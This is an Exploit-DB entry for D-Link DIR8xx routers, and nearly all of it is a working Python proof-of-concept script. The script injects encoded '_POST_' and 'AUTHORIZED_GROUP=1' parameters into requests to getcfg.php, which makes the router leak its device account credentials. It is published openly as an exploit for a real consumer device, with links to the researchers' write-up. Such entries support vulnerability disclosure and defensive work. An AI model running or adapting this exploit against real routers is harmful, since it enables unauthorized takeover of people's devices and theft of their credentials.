D-Link DIR8xx Routers - Leak Credentials

EDB-ID: 42729
Author: embedi
Published: 2017-09-12
CVE: N/A
Type: Webapps
Platform: Hardware
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A 

 # E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin 
 # E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/phpcgi.py 
  
 import requests as rq 
  
 EQ = "%3d" 
 IP = "192.168.0.1" 
 PORT = "80" 
  
 def pair(key, value): 
     return "%0a_POST_" + key + EQ + value 
  
 headers_multipart = { 
     'CONTENT-TYPE' : 'application/x-www-form-urlencoded' 
 } 
  
 url = 'http://{ip}:{port}/getcfg.php'.format(ip=IP, port=PORT) 
 auth = "%0aAUTHORIZED_GROUP%3d1" 
 data = "A=A" + pair("SERVICES", "DEVICE.ACCOUNT") + auth 
  
 print(rq.get(url, data=data, headers=headers_multipart).text)

Source: www.exploit-db.com
Related Posts